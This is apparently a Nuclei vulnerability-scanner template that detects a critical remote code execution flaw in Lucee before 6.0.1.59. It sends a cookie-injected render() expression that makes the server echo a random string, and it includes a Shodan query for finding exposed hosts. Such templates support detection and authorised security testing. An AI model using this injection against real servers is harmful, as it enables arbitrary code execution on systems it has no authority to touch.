id: lucee-rce info: name: Lucee < 6.0.1.59 - Remote Code Execution author: rootxharsh,iamnoooob,pdresearch severity: critical reference: - https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again metadata: verified: true max-request: 1 shodan-query: http.title:"Lucee" tags: lucee,rce,oast http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} Cookie: CF_CLIENT_=render('writeoutput(ToBinary("{{base64('{{randstr}}')}}"))'); CF_CLIENT_LUCEE=render('writeoutput(ToBinary("{{base64('{{randstr}}')}}"))'); matchers: - type: dsl dsl: - contains(body, "{{randstr}}") - contains(header, "cfid") - contains(header, "cftoken") condition: and # digest: 4a0a00473045022060fe80816425743744cb6d3ee5ff6297880c1e513232fd481e5c8844dbea0940022100bb98ce5b02fd42e46d0a71c17251a2d7b7cc8c7169dea74e245eaefa0f3ce228:922c64590222798bb761d5b6d8e72950